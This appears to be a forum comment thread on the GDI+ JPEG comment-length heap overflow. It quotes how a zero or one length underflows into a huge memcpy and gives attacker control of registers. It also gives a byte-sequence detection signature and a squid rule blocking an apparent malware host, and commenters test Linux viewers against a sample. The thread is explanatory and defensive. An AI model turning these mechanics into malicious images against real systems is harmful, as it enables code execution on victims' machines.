JPEG Comment sections (COM) allow for the embedding of comment data into a JPEG image. COM sections are marked beginning with 0xFFFE followed by a 16 bit unsigned integer in network byte order giving the total comment length + the 2 bytes for the length field; a single JPEG COM section could therefore contain 65533 bytes of invisible data (invisible in the sense that it's not rendered as part of the image). Because the JPEG COM field length variable is 2 bytes wide, and itself is included in the length value, the minimum value for this field is 2, this implies an empty comment. If the comment length value is set to 1 or 0, a buffer overflow occurs overwriting heap management structures.

The problem is GDIPlus normalizes the COM length prior to checking it's value; a starting length of 0 becomes -2 after normalization (0xFFFE unsigned), this value is converted to the 32 bit value 0xFFFFFFFE and is eventually passed on to memcpy which attempts to copy ~4G bytes into heap memory.

eEye Digital Security analyzed the bug and found that heap management structures are left in an inconsistent state with execution eventually reaching heap unlink instructions within RTLFreeHeap with EAX pointing to a pointer to data we control and we have direct control of EDX.

Detection could be accomplished by examining the JPEG image for the following byte sequence:

0xFF 0xFE 0x00 0x00 or 0xFF 0xFE 0x00 0x01

So you see what happened. The unchecked library call in this case was memcpy(). The decoder trusts its input and sends a small signed integer (-2) off to memcpy() without checking the sign bit- and memcpy() thinks -2 is a huge unsigned integer (4294967294). What's the difference? Any reasonable number is going to be positive anyway, right? Who would give a comment a negative length!

I saw someone make this kind of goof even in Java, where you have signed-only types forced on you. Someone forgot that InputStream.read() returns an unsigned byte as an int (between 0-255), and they cast it to a signed byte and back without the &0xFF to zero out the 24 high bits. That got caught right before our product release. The consequence in that case would have been a hash algorithm with inconsistent output between stream and byte array inputs- not a security nightmare like this, but a long lasting migraine nevertheless.

Re:Anyone have a working copy?

[famebait]

So, after five minutes of extremely unprofessional research and wild conjectures, I'd say it looks like the stories are true: some Linux programs may be vulnerable too. Yikes!

I don't know much of Linux internals, but I don't think it is obvious that it is vulnerable just because programs can get confused by unexpected data.

UNIX generally has separate code and data segments, and with modern CPUs with memory management the OS should be able to enforce the separation very strictly. Doesn't Linux do this?

It has long been a mystery to me why Windows did not (up until XP SP2). Whole classes of overflow exploits and system threats from bugs are just not be possible if you can't execute code that's not explicitly loaded into executable segments, and if normal data-writes simply don't have write access to executable memory.

app not working != app vulnerable to virus

[sczimme]

* Eye of Gnome seemed to work okay, but I got all sorts of weird redraw problems when I tried to resize the window.
* Gimp (2.1) says the JPEG is unsupported and couldn't be imported by the filter, then segfaults.
* Konqueror seems to work okay, but just shows a tall black rectangle, and its spinner is still chugging away, as if it's still busy loading something.
* Firefox 0.9.3 has no troubles at all; it just shows a nice white rectangle on a white background

These programs are not vulnerable to the the exploit in the same way that Windows machines are vulnerable. In fact, the issues you saw appear to be in no way related to the intended result of the virus. GIMP's segfault seems to be the most serious of these, and it is still a minor problem. I believe all of your results can be achieved by opening a mangled/corrupted .jpg; the exploit code is irrelevant.

Nutshell: One cannot conclude that graphics-related processes/apps on Linux machines are vulnerable to this virus.

PS Conclusions posited based on "unprofessional research and wild conjectures" are likely to cause much more harm than good. Is this really necessary? (not a flame - just an observation)

Re:app not working != app vulnerable to virus

[ajs]

I don't think the poster was saying "these programs are vulnerable to this virus", but rather, "these programs seem to be vulnerable to a similar class of exploit"

Certainly Gimp's segfault points to some sort of bounds-checking problem, and is likely exploitable. NO application should load this image for display. Bounds checking during load should throw an exception (or the equivalent error status for C) for the image and the application should report that the image is corrupt. Under no circumstances should a low-level library be handing this image data further up the chain.

Re:Anyone have a working copy?

[ajs]

I don't know much of Linux internals, but I don't think it is obvious that it is vulnerable just because programs can get confused by unexpected data.

Simple answer: no, and that's why buffer overflow attacks work.

Yeah, I've been waiting for years to hear about the first image-based attacks for Linux. I was kind of surprised that the first exploits arrived for Windows instead of Linux, just because we've known about several holes in Linux over the years (look at the changelog for any image processing library). The down-side is that you can't always "root the box" based on an image attack because a user will be running the browser, but I would think that access to the machine is enough for most zombification and you can always go after local exploits to get root at that point.

Linux needs a good suite of exploitive data (that doesn't do anything) for projects to test against. Perhaps I'll work on that in my spare time (every format and protocol has many spots where it would be easy for a lazy programmer to do static allocation and then fail to bounds-checks, so you just write code/generate data that exploits each one of these places. I've done this for specific proprietary applications before.

Block all access to that particular host on proxy!

For all admins, simply block all access to that host on your proxy/firewall.
Be quick.

Sample squid code:

acl jpeg_exploit dst 209.171.43.27
http_access deny jpeg_exploit

Or, more reasonable:

acl block_dsthost dst "/usr/local/squid/etc/dsthost.list"
http_access deny block_dsthost

and stick 209.171.43.27 into that file (and all following IPs that will use that code).

Then use ClamAV to scan your squid-cache the next couple of days and remove infected files.